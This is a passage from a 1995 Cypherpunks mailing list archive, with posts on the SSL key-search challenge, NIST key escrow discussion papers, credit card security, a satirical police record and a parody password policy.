hack the seed. Always build belt-and-suspenders around any security system. Try to make sure that there are as many ways as possible that things have to fail before you get nuked. Throwing an impediment in the way of non-root users is a good idea. You program it once and it protects forever -- an excellent investment. Perry From jordan at Heuristicrat.COM Wed Sep 20 15:47:32 1995 From: jordan at Heuristicrat.COM (Jordan M. Hayes) Date: Wed, 20 Sep 95 15:47:32 PDT Subject: RSA Prevails In Arbitration Against Cylink Message-ID: <9509202241.AA00756@euclid.Heuristicrat.COM> From baldwin at RSA.COM Wed Sep 20 09:09:30 1995 Here's an article on the RSA-Cylink arbitration from the business wire. [ ... elided -JMH ] Just a note for those who aren't aware, Business Wire is a pay-per-use "news release" service. That is, RSA wrote the contents of what Bob (Hi!) posted. The clue is at the bottom of the "story": CONTACT: RSA Kurt Stammberger, 415/595-8782 kurt at rsa.com This is not to say anything pro or con about the content of the press release; just that it wasn't written by a third party. /jordan From abostick at netcom.com Wed Sep 20 15:51:07 1995 From: abostick at netcom.com (Alan Bostick) Date: Wed, 20 Sep 95 15:51:07 PDT Subject: USA Today on Fear of Credit Cards over Net In-Reply-To: <199509201518.LAA78249@tequesta.gate.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199509201518.LAA78249 at tequesta.gate.net>, liberty at gate.net (Jim Ray) wrote: > Pity they didn't ask about, "Tossing a credit card slip/carbon > in the garbage." Dumpster-diving is still an effective, lo-tech > attack. Why worry about dumpster-diving? Even credit card receipts on carbonless NCR paper are prey to the hungry eyes of underpaid cashiers or the waiter who doesn't think you wrote in a big enough tip. A security scheme is no stronger than its weakest link. Even with the attack Goldberg and Wagner discovered on Netscape SSL, the weakest link in credit card transactions lies elsewhere. I find it curious that USA TODAY didn't include over-the-counter credit card transactions in its poll. Alan Bostick | Seeking opportunity to | If you don't like what you read in the news, develop multimedia content. | go out and make some of your own. Finger abostick at netcom.com | Scoop Nisker for more info and PGP public key -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBMGCYtOVevBgtmhnpAQF6RgL/XrkCJe6v5v6rtUmWTgB27tSmcTTkoeGj CXEQwDw5eHcxe0jfne/r2Y9wSkRZtb4psKIhwLDd3BxxuWhzdrhVcaTcInUV+gGo t4i2Td883rejgqlA4xbPWcWtd5NPSC7U =pi8V -----END PGP SIGNATURE----- From cjl at welchlink.welch.jhu.edu Wed Sep 20 16:04:59 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Wed, 20 Sep 95 16:04:59 PDT Subject: SCIENCE magazine on computers Message-ID: The Sept * issue of SCIENCE magazine has a special section on computers of particular C-punk interest are articles on the rise of symmetric multiprocessor solutions to supercomputer needs and a piece on the future of computing discussing quantum dots, quantum computing, holographic association, optical computers, and DNA computers. SCIENCE vol. 269 pages 1354-1385 C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From m5 at dev.tivoli.com Wed Sep 20 16:10:23 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 20 Sep 95 16:10:23 PDT Subject: software In-Reply-To: <013.01607783.LFWS37A@prodigy.com> Message-ID: <9509202310.AA12270@alpha> MR STEVE R. KELL writes: > I need new crypt software w/instruction if possible. My favorite cypherpunks mail so far. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From tcmay at got.net Wed Sep 20 16:25:01 1995 From: tcmay at got.net (Tcmay@got.net) Date: Wed, 20 Sep 95 16:25:01 PDT Subject: CLAIMING CHUNKS OF KEYSPACE... Message-ID: <9509201546165270@ci.diamond-bar.ca.us> Date: Mon, 28 Aug 1995 23:02:01 -0700 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Claiming chunks of keyspace... Looking at it from the outside, I thought the latest SSL challenge experiences were highly instructive. Nothing to be ashamed of. An interesting question: Is it a valid approach for J. Random User to "claim" some chunk of keyspace to search? If the "reward" of finding the gold buried in the keyspace (a key that meets the challenge) is high and the cost of claiming the keyspace is low (or nil), then game theory tells us that some folks will be tempted to claim a bigger chunk of keyspace than they can possibly process. What can be done to reduce this effect? On the negative side, ostracize or punish those who bite off more than they can chew. This approach is fraught with dangers. On the positive side, let everyone simply attack the keyspace as they see fit, picking random parts to attack. This should not be "worse" than a factor of several from a "perfectly coordinated" attack. (I haven't spent time calculating this, but my intuition is that a random attack, with overlapping keyspace, is not a lot less efficiently attacked than attempting to arrange for no overlaps...just based on my mental picture of dropping line segments randomly on some interval and figuring coverage of the line segment.) In between, market systems where itermediate agents subcontract out chunks of keyspace. Mechanisms for this are lacking. -Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Sep 20 16:25:17 1995 From: tcmay at got.net (Tcmay@got.net) Date: Wed, 20 Sep 95 16:25:17 PDT Subject: "CITIZEN-UNIT IDENTIFICATION" A RED HERRING Message-ID: <9509201546155269@ci.diamond-bar.ca.us> Date: Mon, 28 Aug 1995 21:44:12 -0700 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: "Citizen-Unit Identification" a Red Herring All this paranoid talk about the dangers of thumbprints on ID cards, about driver's licenses, and about magstripes got me to thinking. So, I accessed my NLETS (National Law Enforcement Telecommunications System) and downloaded my own record: Citizen-Unit ASCII Name: "Timothy Christopher May" NLETS Actual Name: G0Yj34C1qm92H7u Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo" Residence: 427 Allan Lane, Corralitos, CA 95075 Driver's License: N4197484 SSN: 227-80-5823 Passport Number: H673qop90 Race: Aryan Origin: Europe Hair: Brown Eyes: Blue Weight: 210 pounds (10/94, recorded at SFO) Known associations: Anarchist Alliance, Young Students for Discordianism, Vernor Vinge Fan Club, Information Liberation Front Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan Events, Information Week Consumer Preferences: beer (+++), wine (+), cigarettes (-) Electricity Patterns: consistent with either marijuana cultivation or heavy Net usage, or both Threat level: Class 3 Security Threat I don't see what the big deal is. The NLETS record implies I'm some kind of security threat, but also correctly notes that I'm an Aryan, so I guess I'm safe. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From vznuri at netcom.com Wed Sep 20 16:25:29 1995 From: vznuri at netcom.com (Vznuri@netcom.com) Date: Wed, 20 Sep 95 16:25:29 PDT Subject: SSL keyspace etc. Message-ID: <9509201546195281@ci.diamond-bar.ca.us> Date: Tue, 29 Aug 95 12:40:08 -0700 From: "Vladimir Z. Nuri" regarding SSL challenge, I am not following this close enough to understand completely, but I thought I would offer a few suggestions for tweaking the code: -- the issue of grabbing keyspace has been raised. what if someone malicious just yanked huge areas of keyspace and didn't search them? it seems that the clients need to return to the server some evidence that they have searched their keyspace in question. the server could verify this evidence. for those that don't return the "evidence", that keyspace could be reallocated to other comers. the simple approach to all this, if you don't have "evidence", is to just have the server keep reallocating the same space over and over to different crackers. hopefully eventually every part of the keyspace would be allocated to a "legitimate" worker. -- the issue of efficiency is very fascinating for this project. essentially the server has no idea what the block size of key blocks it should dole out. obviously the server would want to try to dole out equal *processing chunks* such that the remote machine reports back in a certain amount of time, no matter what architecture. the problem of course is that remote machines all have different efficiency. two possibilities: a sort of "bogomip" calculation is done in the client, and its processor speed is reported to the server. the server uses this in a calculation to determine how much to dole out. it could try to derive a best fit linear relationship between space covered and processor spead, or build up a table of results and interpolate for new requests. note that the efficiency issue also ties into "what if people take keys they don't solve". if the server knows roughly how long a client should take to report back, and it never reports back, it could then reallocate that key space. -- another problem of efficiency is that the server is clearly a bottleneck for servicing requests. the question arises: suppose that the server could determine the precise interval between which machines would go back to it for new keys. what is the optimum interval over the whole project? in other words, give the number of machines participating, and their processor speeds, what size of key space should be parceled out to the next request so that the bottleneck at the server is minimized? this optimum interval must be very hard to derive, because it depends on the contention based on many incoming connections. it would involve some probabilistic approximations of the likelihood of collisions. to model it, you might consider a request as taking [n] seconds of time, and consider that if any two requests are in contention, a retry happens after [m] seconds. you could build up models that would try to minimize the time based on empirical simulations. however I would be exceedingly impressed if someone could derive a formula for this, or give it from some textbook. -- adaptive algorithms for all these situations are possible. the server could use a "hypothesis" in the sense of partitioning out a starting size of keyspace, and then watch how long it took the client machine to respond and then assume a linear relationship or something to compute the size of the next keyspace to hand out to the machine. the server could continually watch how closely its "hypothesis" (i.e. its estimations of how long a given machine will take) match the actual returns. -- more on the idea of evidence: we are working with a hashing algorithm, right? as evidence the client machines could return checksums of all the hashes of all the keyspace it searched. it could break up its own search space into blocks and return the checksums on the hashes for each block. the server, if it wanted to, could verify these blocks running its own computations. if it ever found a client was "unreliable", it could then diminish the keys sent to the unreliable client, or even send it areas of search space it didn't care about anymore (i.e. areas that have already been confirmed searched by a more "reliable" client). -- in fact all this reminds me of the process of intelligence gathering by an agency, which could be formalized as follows: suppose that the agency wishes to identify "quality information". it has a set of sources, A,B,C,D.... now, it can send questions out to these sources and get information from them. some of them however would be "unreliable". the agency must devise some means by which it can weed out the unreliable sources. note that this may even involve sending them bogus instructions to keep them busy so they do not themselves suspect they have been "discovered" and then change their defective plans. obviously, one of the most important intelligence tools in this matter is that of *correlation*. you have to determine "truth" (or "quality information") via the correlation between answers that the different sources give you. also important to correlation is *redundancy*. you sometimes have to ask more than one source the same question, and test the answer. in this model, if A and B give different answers, you know that one of A or B is "unreliable". what is very interesting in our case of cracking keys is that the server can verify the information on its own. in other words, it has a *control* that it knows is correct that it can judge against the answers "out there". unfortunately, in contrast, real intelligence agencies are not always privy to this kind of certain "control" and in fact have to determine "truth" entirely from a set of sources, any of which might be unreliable. in this case one has to have a hypothesis about what is the "truth" and test it to see if it holds up consistently with all information. the approaches of attackers are obvious. the most obvious is that of collusion and infiltration. but I will save the rest for some NSA spook to elaborate. there are certainly enough colluding and infiltrating on this list -- one of the reasons all this interests me is that it really reminds me of some projects I have worked on in the past. in high school I wrote a network mandelbrot set program (client/host). the issue of contention arose and it appeared to me to look like an upside-down parabola after I plotted some points (curving up, that is). i.e. the optimum was at the pit of the parabola, and when too few or too many requests happened, the speed over the overall simulation was increased above the optimum. some very ingenious readers may actually be able to locate this code, which I put in the public domain over 5 years ago. -- another thing I worked on was trying to find the optimal block size of communications protocols such as Zmodem, which generally instead just pick arbitrary block sizes 2^n. I actually was able to attack this problem analytically through the observations of the properties of infinite series and calculus techniques. it is a similar problem but the idea of contention really complicates this issue. (for what I studied, there was only one client and one server, so to speak). I still have this paper in Latex format and if anyone is interested I would be happy to send it to you. it's a really nice example, IMHO, of how if you use your brain and some mathematics, you can really get a far more elegant approach than brute force, and know with much greater certainty that what you are doing makes sense mathematically. an awful lot of programmer just tend to bang on the keyboard with out thinking of the theoretical implications of their work. this is understandable given that the theoretical implications of even trivial programs (such as the SSL client/server interactions) can be mathematically extremely daunting, requiring even differential equations to model fairly simple pieces of code. -- well, that is my contribution of the moment into the cypherpunk annals. one never knows what a little combination of boredom and inspiration can lead to. --V.Z.Nuri From alano at teleport.com Wed Sep 20 16:25:31 1995 From: alano at teleport.com (Alano@teleport.com) Date: Wed, 20 Sep 95 16:25:31 PDT Subject: FLORIDA DRIVERS PERMITS AND A HELLO Message-ID: <9509201546185279@ci.diamond-bar.ca.us> Date: Tue, 29 Aug 1995 12:06:42 -0700 To: cypherpunks at toad.com From: Alan Olsen Subject: Re: Florida Drivers Permits and a Hello At 01:47 PM 8/29/95 -0500, you wrote: >Alan Olsen writes >>They would not have to include an entire thumbprint. The actual code used >>to verify fingerprints is not very large. All that would be needed is >>enough information to ID into the "official" records and enough checksum >>type information to prevent alteration/counterfitting. Using magnetic media >>for this is a bit foolish as it can be changed/destroyed with the stroke of >>a magnet. I will not say by what means I would think should suit as a >>better encoding scheme because: 1) They are not using it and 2) I do not >>want to give them any ideas. > >What possible value could the LEAs get by having your thumbprint digitally >encoded on your driver's license? It's not like the average cop-on-the-beat >is qualified to lift a fingerprint and compare it. Even if he was, how >does it benefit that the fingerprint is on the license? > >This seems silly. I was pointing out that it was possible. I was not trying to make the point that there was any *USE* for such a thing. (Evidently some ID cards now carry such prints. California does, if memory serves me correctly.) Just because something is silly does not mean it will not be tried by someone in law enforcement. In fact, there seems to be a corelation between silly acts and law enforcement... (Or at least those making the rules about law enforcement.) And if you think it cannot get any worse, Pete "I want to seal the borders" Wilson has announced he is running for president. We will be getting a large number of silly laws and pronouncements if the American people are stupid enough to elect him to high office. > > | Visualize whirled keys! | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites | Disclaimer: | |all mankind free in one-key-stenography-privacy!"| Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From remailer at flame.alias.net Wed Sep 20 16:26:53 1995 From: remailer at flame.alias.net (Remailer@flame.alias.net) Date: Wed, 20 Sep 95 16:26:53 PDT Subject: NIST KEY ESCROW MEETING Message-ID: <9509201546255317@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 07:51:07 +0200 To: cypherpunks at toad.com From: Flame Remailer Subject: NIST Key Escrow meeting Subject: NIST Key Escrow Meeting Discussion Papers Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #1 Issues -- Export of Software Key Escrowed Encryption On August 17, 1995, the Administration announced its proposal to permit the ready export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. Under the proposal, products will be reviewed to verify that they satisfy the criteria and, if so, they will be transferred to the Commodity Control List administered by the Department of Commerce where the products can be exported under a general license (in much the same way that 40-bit RC2/RC4 encryption is licensed today). We are working toward creating broadly stated criteria that are in the nature of performance specifications. To meet these criteria, encryption products will need to implement key escrow mechanisms that cannot be readily altered or bypassed so as to defeat the purposes of key escrowing. The criteria, when finalized and published, will state the objectives, but not the exact technical method(s), by which those objectives are satisfied. This is to provide software publishers the flexibility to design methods for meeting our stated objectives in a manner that is compatible with the design of their products. There are, therefore, a number of questions we must work together to answer in order to draft effective criteria. These questions are: * Avoiding multiple encryption -- How can the product be designed so as to prevent doubling (or tripling, etc.) the key space of the algorithm? * Disabling the key escrow mechanism -- How can products be made resistant to alteration that would disable or circumvent the key escrow mechanism? How can the "static patch" problem be avoided? How can this be tested? * Access to escrow information -- What mechanisms must be designed into encryption products to allow authorized access to escrowed keys? This likely includes the identity of the key escrow agent(s) and a serial number for the key escrow agent to use to identify the key(s)/component(s) necessary to decrypt the message. What other information will be necessary to be provided to the escrow agent to identify the necessary key(s)/component(s)? Are there other comparable viable approaches? * Non-escrowed use -- How can products be made so that they do not function with non-escrowed products (or tampered escrowed products)? How can this be tested? * Limiting surveillance -- How can products be designed so that information both sent and received by the user can be decrypted without release of keys of other users? * Practical Key Access -- How can mechanisms be designed so that repeated involvement of escrow agents is not required for decryption for multiple files/messages during the specified access period? * Assurance that keys are escrowed -- How can it be assured that key escrow products are indeed satisfactorily escrowed? For example, products could be required to be escrowed at time of manufacture or be made inoperable until properly escrowed. * Ability to re-escrow keys -- How can products be designed so that new keys can be escrowed at the user's discretion with a U.S. Government approved escrow agent? * Certified escrow agents -- Can products be designed so that only escrow agents certified by the U.S. government (domestic, or under suitable arrangements, foreign) are utilized? What should be the criteria for an acceptable U.S. escrow agent? -------------- With your input, we are hopeful that this effort will lead to definitive criteria, which will facilitate the development of exportable products and help minimize the time required to obtain export licenses. The Administration seeks to finalize such criteria and make formal conforming modifications to the export regulations before the end of 1995. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e- mail: carlton at micf.nist.gov. 8/25/94 ----------------------------- Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #2 Discussion Issues: Desirable Characteristics for Key Escrow Agents In the government's recent announcement of its intent to allow the export of 64-bit software key escrow encryption products, one stipulation was that the keys would be escrowed with an approved key escrow agent.(*1) Exactly what qualifications/considerations are appropriate for approval as a key escrow agent have not been defined. Some of the issues which need to be discussed and resolved include the following: * What kinds of organizations should be excluded from consideration as approved key escrow agents? * What sort of legal agreement between the government and the key escrow agent is necessary to stipulate the responsibilities of the agent? Should this include the terms and conditions under which release of a key is required? * How will liability for unauthorized release of key be handled? * Should, for example, intentionally misreleasing or destroying a key be criminalized? Should this include other actions? * How can the government's needs for confidentiality of key release be handled? * Should approval of key escrow agents be tied to a public key infrastructure (for digital signatures and other purposes)? * What procedures need to be developed for the storage and safeguarding of keys? * What are the acceptable performance criteria (e.g., around- the-clock availability, accessibility, reliability, etc.) for approved key escrow agents? * Under what circumstances will key escrow agents in foreign countries be approved? * What process will be used to approve escrow agents? Costs/who pays? --------- (*1) "Approved," for the purposes of this discussion, means that the government (or its agent) has formally granted permission for an organization to hold keys for exportable encryption products. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. From carolann at censored.org Wed Sep 20 16:26:55 1995 From: carolann at censored.org (Carolann@censored.org) Date: Wed, 20 Sep 95 16:26:55 PDT Subject: THE ILLEGAL MARKETS OF CYBERSPACE Message-ID: <9509201546275326@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 02:48:43 -0500 To: cypherpunks at toad.com From: carolann at censored.org (Censored Girls Anonymous) Subject: Re: The illegal markets of cyberspace Thank you for the easy to understand concepts. Now where was that nobody at nobody.org key again? Love Always, Carol Anne....wondering if the Undernet was as good as the Blacknet? -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From alano at teleport.com Wed Sep 20 16:27:05 1995 From: alano at teleport.com (Alano@teleport.com) Date: Wed, 20 Sep 95 16:27:05 PDT Subject: [COMP.SECURITY.UNIX] ADVICE ON PASSWORD SECURITY GUIDELINES Message-ID: <9509201546345375@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 20:55:24 -0700 To: cypherpunks at toad.com From: alano at teleport.com (Alan Olsen) (by way of Alan Olsen wrote: >From: Paul Ashton >Newsgroups: comp.security.unix >Subject: Advice on password security guidelines >Hi, >my boss has asked me for comments and improvements on his new password >security policy. To me, it seems a bit severe. If anyone can offer any >additional suggestions please do, here goes... >For immediate issue: >Password changing guidelines V2.2b >Due to new security policies, the following guidelines have >been issued to assist in choosing new passwords. Please follow >them closely. >Passwords must conform to at least 21 of the following attributes. >1. Minimum length 8 characters >2. Not in any dictionary. >3. No word or phrase bearing any connection to the holder. >4. Containing no characters in the ASCII character set. >5. No characters typeable on a Sun type 5 keyboard >6. No subset of one character or more must have appeared on > Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha) >7. Must be quantum theoretically secure, i.e. must automatically change > if observed (to protect against net sniffing). >8. Binary representation must not contain any of the sequences 00 01 10 11, > commonly known about in hacker circles. >9. Be provably different from all other passwords on the internet. >10. Not be representable in any human language or written script. >11. Colour passwords must use a minimum 32 bit pallette. >12. Changed prior to every use. >13. Resistant to revelation under threat of physical violence. >14. Contain tissue samples of at least 3 vital organs. >15. Incontravertible by OJ Simpsons lawyers. >16. Undecodable by virtue of application of 0 way hash function. >17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking > form and inert. >18. Contain non-linear random S-boxes (without a backdoor). >19. Self-escrowable to enable authorities to capture kiddie-porn people > and baddies but not the goodies ("but we'll only decode it with a > court order, honest"). >20. Not decryptable by exhaustive application of possible one time pads. >Due to the severity of the restrictions, if the password is entered >incorrectly 3 times at login time, you will be asked if you would like to >pick a new one. >Please add guidelines to the above and adjust the minimum conformation >requirement, if applicable. >-- >Moderators accept or reject articles based solely on the criteria posted >in the Frequently Asked Questions. Article content is the responsibility >of the submittor. Submit articles to ahbou-sub at acpub.duke.edu. To write >to the moderators, send mail to ahbou-mod at acpub.duke.edu. | Spam is the Devil's toothpaste! | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From stewarts at ix.netcom.com Wed Sep 20 16:27:09 1995 From: stewarts at ix.netcom.com (Stewarts@ix.netcom.com) Date: Wed, 20 Sep 95 16:27:09 PDT Subject: CIA & ESPIONAGE Message-ID: <9509201546405398@ci.diamond-bar.ca.us> Date: Thu, 31 Aug 1995 02:31:07 -0700 To: cypherpunks at toad.com From: Bill Stewart Subject: Re: CIA & Espionage >> >It was said that Pres. Clinton had given a speech while >> >visiting the CIA HQ in Langley/Virginia. He allegedly >> >said in this speech that obtaining industrial >> >informations has the highest priority and this were the >> >new task for the spies. Did he really say the priority was stealing information from other people, or only protecting Big American Companies from those nasty French Spy Agency persons? (Clinton being who he is, I'd expect him to say a politically correct version of the latter, whether he means the former or not, just like his predecessor.) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From monty.harder at famend.com Wed Sep 20 16:28:06 1995 From: monty.harder at famend.com (Monty.harder@famend.com) Date: Wed, 20 Sep 95 16:28:06 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <9509201546395394@ci.diamond-bar.ca.us> From: monty.harder at famend.com (MONTY HARDER) Date: Wed, 30 Aug 95 23:50:00 -0500 Organization: The First Amendment BBS Regardless of whether Ito allows the tapes into evidence, the public has heard a LEO matter-of-factly discussing the fabrication of evidence against US citizens. We should take advantage of this, by connecting the Fuhrman/Good Ole Boys from BFART bit, and GACK. If my private key must be escrowed with Lawn Forcement Agencies, the very real possibility exists of a Fuhrman using it to forge evidence against me. In =any= Key Escrow arrangement (including the non- government variety preferred by 4 out of 5 Cypherpunks in a recent survey) there must be a division between encryption keys and signature keys. I recommend that anyone who will be using escrowed keys generate two pairs: First, the signature key, including in the userid some kind of [sig use] identifier (we should settle on a standard abbreviation for this) follower by the encryption key. This way, when a person gets your pubkeys, they get the encryption key =last=, which gets it searched first whenever they PGP -e... something. Whatever arrangements are made for escrowing my encryption key, =nobody= gets my signature key. If I am fired, quit, become brain damaged or dead, my key can never be used by anyone to implicate me in any criminal activity. Please don't mention to anyone the fact that my signature key can be used to send me something that even the escrow agents can't read.... * --- * Monster at FAmend.Com * From cwe at csli.stanford.edu Wed Sep 20 16:29:25 1995 From: cwe at csli.stanford.edu (Cwe@csli.stanford.edu) Date: Wed, 20 Sep 95 16:29:25 PDT Subject: SSL and MIPS... Message-ID: <9509201546275319@ci.diamond-bar.ca.us> Date: Tue, 29 Aug 1995 23:03:59 -0700 From: Christian Wettergren Hi! How much computing power did we actually use, in terms of MIPS/FLOPS*hours? An unloaded SS10 that didn't swap went at approximately 16400 keys/s. How many MIPS is an SS10 approximately? How does different algoritms compare? DES, RC40, RSA512 etc? Or if I pose the question differently, what can you do with 30 GIPS for a day? /Christian From shamrock at netcom.com Wed Sep 20 16:29:25 1995 From: shamrock at netcom.com (Shamrock@netcom.com) Date: Wed, 20 Sep 95 16:29:25 PDT Subject: NIST KEY ESCROW MEETING Message-ID: <9509201546335369@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 19:58:52 -0800 To: cypherpunks at toad.com From: shamrock at netcom.com (Lucky Green) Subject: Re: NIST Key Escrow meeting At 7:51 8/30/95, Flame Remailer wrote: >Subject: NIST Key Escrow Meeting Discussion Papers > >Key Escrow Issues Meeting, September 6-7, 1995 >Discussion Paper #1 [Old and new GAK requirenments elided] >With your input, we are hopeful that this effort will lead to >definitive criteria, which will facilitate the development of >exportable products and help minimize the time required to obtain >export licenses. The Administration seeks to finalize such >criteria and make formal conforming modifications to the export >regulations before the end of 1995. > > >Note: These issues will be discussed at the Key Escrow Issues >Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at >the National Institute of Standards and Technology (Gaithersburg, >Maryland). The meeting will be open to the public, although >seating is limited. Advance registration is requested, please >contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e- >mail: carlton at micf.nist.gov. Will any Cypherpunks attend this meeting? I sure hope we get to make our ideas know. -- Lucky Green PGP encrypted mail preferred. From sjb at austin.ibm.com Wed Sep 20 16:29:25 1995 From: sjb at austin.ibm.com (Sjb@austin.ibm.com) Date: Wed, 20 Sep 95 16:29:25 PDT Subject: A problem with anonymity Message-ID: <9509201546465435@ci.diamond-bar.ca.us> Date: Thu, 31 Aug 1995 18:32:01 -0500 From: Scott Brickner I was thinking about some issues related to electronic commerce, and it occurred to me that there is a significant problem in conducting business with untraceable pseudonyms (anonyms?). The problem occurred to me while considering inheritance. If one operates a business under an anonym (as opposed to the sort of conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit Cards" ), there's a strategy for transferring unlimited funds to one's posterity. Consider a business which typically has a lot of assets, but which are offset by a lot of liabilities --- almost any sort of VAR will do, for instance. In your will, you leave the key to unlock a private message to your heir, in which you hand over the information necessary to assume your anonym. Since the heir presumably has his own identity (whether anonymous or not is immaterial, except to *his* heirs), and the anonym can't be linked to you, he has no reason to care about maintaining the reputation of the anonym. In dismantling the anonym, he sells its assets to his own identity at a fraction of their worth, and defaults on the liabilities. Since the anonym behaved reputably during its life, it developed what would have been a credit-worthy reputation, had it been a (traceable) pseudonym. But, since there's nothing to link the anonym to its heirs (or ancestors), the creditors of the anonym must eat the loss. Since the process of taking an anonym from scratch to a positive reputation would be reasonably short (presumably not too much longer than taking a real name or pseudonym the same distance), especially when helped along by being fed the profits from the legitimate business of an ancestor anonym, it's likely that a single individual could pull off such an asset transfer at least two or three times a decade, as well as at inheritance time. A market which permits anonyms to have credit based on reputation will probably have a constant stream of defaults caused by such behavior, representing a significant risk factor in extending credit to anonyms which can't be predicted by reputation. Comments? From frissell at panix.com Wed Sep 20 16:29:33 1995 From: frissell at panix.com (Frissell@panix.com) Date: Wed, 20 Sep 95 16:29:33 PDT Subject: MORE DISINTERMEDIATION Message-ID: <9509201546295337@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 10:33:33 -0400 To: cypherpunks at toad.com From: Duncan Frissell Subject: More Disintermediation According to Monday's USA Today, the Customs Service has come up with a plan to stop stopping international travelers arriving at US airports. Apparently they can't afford "personal" service any more. With 60 million arrivals, Customs has decided to mingle a bit in luggage claim, look for those meeting its profiles, and use drug- and food-sniffing dogs to catch smugglers. Note that international travel has doubled in the last few years. What is Customs (and La Migra) going to do when it doubles again. It is much easier for market phenomenons like this to double or triple than it is for government agencies to double or triple. Markets scale well. Governments don't. DCF "When foreigners steal 'our' jobs, our labor is freed for other tasks and total world product increases. Jobs can no more 'run out' than desire for things in general can 'run out'." From goedel at tezcat.com Wed Sep 20 16:29:35 1995 From: goedel at tezcat.com (Goedel@tezcat.com) Date: Wed, 20 Sep 95 16:29:35 PDT Subject: SSL SUGGESTIONS Message-ID: <9509201546285327@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 03:14:10 -0600 To: cypherpunks at toad.com From: goedel at tezcat.com (Dietrich J. Kappe) Subject: SSL Suggestions -----BEGIN PGP SIGNED MESSAGE----- Many people have suggested improvements to the techinical side of brutessl. I don't think anyone has looked at the user interface side of things. A simple configure script, and a few more reasonable defaults would bring quite a few more volunteers. I know of at least a handful of people who did not contribute because they were overwhelmed by the unfriendly scripts. While a rough user interface could serve as a basic intelligence test, I don't think that this sort of exclusion is necessary, given the nature of the task. DJK -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMEQrvHIf3YegbdiBAQE1pAJYnoXhffJeTrfiEm8R1fDGMuuZCpATw9gL M+A+LawHiPFeoHtcHp3ZBkhzOqEFS6MfMJ1wjbt9e3ILSJkVGC71OrkpiNcDBMKY 0G9G =3NIJ -----END PGP SIGNATURE----- Dietrich J. Kappe | Red Planet http://www.redweb.com/ Red Planet, L.L.C.| "Chess Space" /chess 1-800-RED 0 WEB | "MS Access Products" /cobre Web Publishing | PGP Public Key /goedel/key.txt From hallam at w3.org Wed Sep 20 16:37:02 1995 From: hallam at w3.org (Hallam@w3.org) Date: Wed, 20 Sep 95 16:37:02 PDT Subject: CIA & Espionage Message-ID: <9509201546295340@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 95 11:16:01 -0400 From: hallam at w3.org >In a german weekly 